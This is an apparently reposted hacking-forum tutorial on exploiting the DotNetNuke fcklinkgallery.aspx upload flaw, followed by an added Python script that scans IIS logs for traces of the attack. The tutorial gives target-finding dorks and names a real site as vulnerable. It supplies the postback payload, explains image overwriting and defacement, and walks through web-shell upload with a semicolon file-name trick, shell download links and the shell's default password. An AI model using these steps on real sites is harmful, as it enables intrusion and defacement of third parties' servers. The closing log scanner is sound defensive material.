King-Shan


[TUT]Hack Website Using DNN [Dot Net Nuke] Exploit WITH SHELL UPLOADING

Note: only for educational purposes.

Using a Google dork, try to find the vulnerable website.

inurl:"/portals/0"
OR
inurl:tabid/176/Default.aspx


You can also modify this Google dork according to your needs and requirements.

I have found these 2 websites vulnerable to this attack:
http://www.hancocksigns.com/

N00bs can also try both of these websites for testing purpose.


Open the home page and check any image which is located in /portals/0/
Check the location of the image. It should be located in /portals/0/
For example, in the case of http://www.hancocksigns.com/ the image is located at location-
Waaooo it means this website is vulnerable and we can change the front page pic. Now the current image name is
hea2d.gif
Now here is the exploit
Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
HOW TO RUN ?
Step 1
You will see the portal where it will ask you to upload. Select the third option, File (A File On Your Site).



Step 2
After selecting the third option, replace the contents of the URL bar with the script below:

javascript:__doPostBack('ctlURL$cmdUpload','')
After running this JavaScript, you will see something like this:



Now remember, if the image is directly in the following format
Portals/0/xyz.jpg
then just click on Choose File and upload it.
But if it is in another format like ours, where the image is in the following format
Portals/0/images/hea2d.gif
that means the image is stored in the images folder, so first click on file location and select images,
then put in the script and then upload.
Now remember, if you want to change the image, first give the image you want to upload the same name as the uploaded image.
For example, if I want to upload the image, I will name it hea2d.gif
and then upload it.
Note: we are doing this only for educational purposes. We don't want to attack anyone's income source, so please take a backup of the image you will be changing, so that after learning you can upload the original image back. Thanks.

Part  II
Uploading the shell
In this part you will learn how to upload the shell so that you can deface the site.
Note: only for educational purposes.
All steps are the same until step 2.
Just download this shell and upload it.
After uploading the shell, open it in this format:
http://www.site.com/portals/0/jaguar.asp;me.jpg
you will see like this
For video TUT visit
http://www.youtube.com/watch?v=e9TZ-gXWLzI
Now comes the shell uploading part.
All parts are the same... Just where you upload the image, upload the asp shell in shell.asp;me.jpg format.
Shell link
http://www.mediafire.com/?0t1jmjmgnw2
So when the shell is uploaded your shell link will be something like this
www.site.com/portals/o/shell.asp.me.jpg
Another fun part: download the apsxsyp shell from here
http://www.mediafire.com/?isjvjngsl9udu10
Upload this shell using the shell we uploaded first.. Now this shell link will be
www.site.com/portal/o/shell.aspx
Default password for shell is admin
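
The requests described in both parts leave recognisable entries in the web server log. The following is an added example, not part of the original post: a Python scan of IIS W3C logs for requests to fcklinkgallery.aspx and for script-named files under /portals/, including the name.asp;me.jpg pattern. The log lines, IP addresses, the file name "example" and the extension list are constructed assumptions.

```python
import re
from urllib.parse import unquote

# Constructed IIS W3C log lines (not from a real server); IPs are documentation ranges.
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2012-03-01 10:00:01 GET /Default.aspx tabid=176 198.51.100.7 200
2012-03-01 10:02:13 GET /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx - 203.0.113.9 200
2012-03-01 10:02:40 POST /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx - 203.0.113.9 200
2012-03-01 10:03:05 GET /portals/0/images/hea2d.gif - 198.51.100.7 200
2012-03-01 10:03:30 GET /Portals/0/example.asp;me.jpg - 203.0.113.9 200
2012-03-01 10:04:02 GET /portals/0/example.aspx - 203.0.113.9 200
"""

GALLERY = "/providers/htmleditorproviders/fck/fcklinkgallery.aspx"
# Server-side script extension followed by ';' or ending the name (assumed list; adjust to your handler mappings).
SCRIPT_EXT = re.compile(r"\.(asp|aspx|asa|cer|ashx)(;|$)")

def classify(method, stem):
    """Return a finding label for one request, or None if nothing matched."""
    path = unquote(stem).lower()
    if path == GALLERY:
        return "gallery-post" if method == "POST" else "gallery-access"
    if path.startswith("/portals/"):
        name = path.rsplit("/", 1)[-1]
        m = SCRIPT_EXT.search(name)
        if m:
            return "semicolon-script-name" if m.group(2) == ";" else "script-in-portals"
    return None

def scan(log_text):
    """Parse W3C lines using the #Fields header and return (label, client IP, URI) tuples."""
    fields, findings = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split()))
        label = classify(row.get("cs-method", ""), row.get("cs-uri-stem", ""))
        if label:
            findings.append((label, row.get("c-ip"), row.get("cs-uri-stem")))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(*finding)
```

Any hit on a script-named file under /portals/ is worth checking against the files actually present in that directory, since user content folders should hold no executable content.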



